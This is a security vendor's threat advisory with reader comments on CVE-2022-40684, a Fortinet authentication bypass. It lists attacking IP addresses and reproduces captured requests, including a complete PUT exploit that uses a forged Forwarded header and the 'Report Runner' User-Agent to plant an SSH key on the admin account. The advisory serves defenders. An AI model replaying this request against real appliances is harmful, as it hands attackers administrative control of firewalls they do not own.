Threat Advisory: CVE-2022-40684

Threat Advisory: CVE-2022-40684 Fortinet Appliance Auth bypass

This morning, the Wordfence Threat Intelligence team began tracking exploit attempts targeting CVE-2022-40684 on our network of over 4 million protected websites. CVE-2022-40684 is a critical authentication bypass vulnerability in the administrative interface of Fortinet’s FortiGate firewalls, FortiProxy web proxies, and FortiSwitch Manager, and is being actively exploited in the wild¹,².

At the time of publishing, we have recorded several exploit attempts and requests originating from the following IP addresses:

  • 206.189.231.41
  • 172.105.131.156
  • 45.79.174.33
  • 143.110.215.248
  • 159.180.168.61
  • 194.195.241.147
  • 45.79.174.9
  • 45.79.174.160
  • 134.122.38.186
  • 104.244.77.122
  • 45.79.174.212
  • 2.58.82.81
  • 194.163.135.129
  • 173.212.205.42
  • 172.104.6.178
  • 38.242.217.243
  • 194.135.83.48
  • 134.122.44.177
  • 207.180.241.85
  • 75.128.217.136
  • 107.189.4.80

Most of the requests we have observed are GET requests presumably trying to determine whether a Fortinet appliance is in place:

GET /api/v2/cmdb/system/admin/admin HTTP/1.1
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
X-Forwarded-Proto: https
X-Forwarded-Ssl: on
X-Forwarded-For: 75.128.217.136
Host: <redacted>
Content-Type: application/x-www-form-urlencoded

However, we also found that a number of these IPs are also sending out PUT requests matching the recently released proof of concept, referenced at the end of this advisory, which attempts to update the public SSH key of the admin user:

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
X-Forwarded-For: 172.104.6.178
Accept-Encoding: gzip
Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
Connection: close
User-Agent: Report Runner
Host: <redacted>
Content-Type: application/json
Content-Length: 610


{
"Ssh-public-key1":"\"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58= dev@devs-MacBook-Pro.local\""
}

While some requests are using a fake public key, which may indicate a benign vulnerability scanner, all of the requests using a valid public key are using the same public key, indicating that these requests are all the work of the same actor. An attacker able to update or add a valid public SSH key to a user’s account on a system can then typically gain access to that system as that user if they have the corresponding private key. In this case the attacker is attempting to add their own public key to the admin user’s account.

The SSH key has the following fingerprint: SHA256:GBl4Pytt+W2yEZ3zlOkAZkgtqmTPBcEZlqK4hoNOqBU dev@devs-MacBook-Pro.local (RSA)

All of the PUT exploit attempts we have seen are using the “Report Runner” User-Agent as this is a requirement of the exploit, though the exploit may also be viable with the User-Agent set to “Node.js”.

New IP Addresses attacking CVE-2022-40684 will appear on the Wordfence Intelligence IP Threat Feed in the “auth_bypass” category as the feed is updated every 60 minutes.

1. Fortinet released an advisory with additional information, including affected products and workarounds for users unable to patch.
2. Horizon3.ai initially discovered that the vulnerability was being exploited in the wild and released a proof of concept earlier today.

This article was written by Ramuel Gall, a former Wordfence Senior Security Researcher.

Did you enjoy this post? Share it!

Comments

4 Comments
  • That key matches the one used by researchers covering the vulnerability at this URL:

    https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/

    • That it does. If that is their ssh key rather than what they've been seeing in the wild, it's possible a naive attacker copied their demo request. If it's them I hope they got permission to test, since that will give admin access to whoever has the corresponding private key if it hits a vulnerable device.

  • I've tried to exploit using horizon py, it worked but only by LAN even if the SSH is disabled on all interfaces. But it is blocked if I restrict access to IP trusted.
    But can somebody confirm that restrictions are enough to mitigate that exploit.

    • Hi,

      The official PSIRT at https://www.fortiguard.com/psirt/FG-IR-22-377 indicates that restricting access to trusted IPs may be sufficient if configured correctly.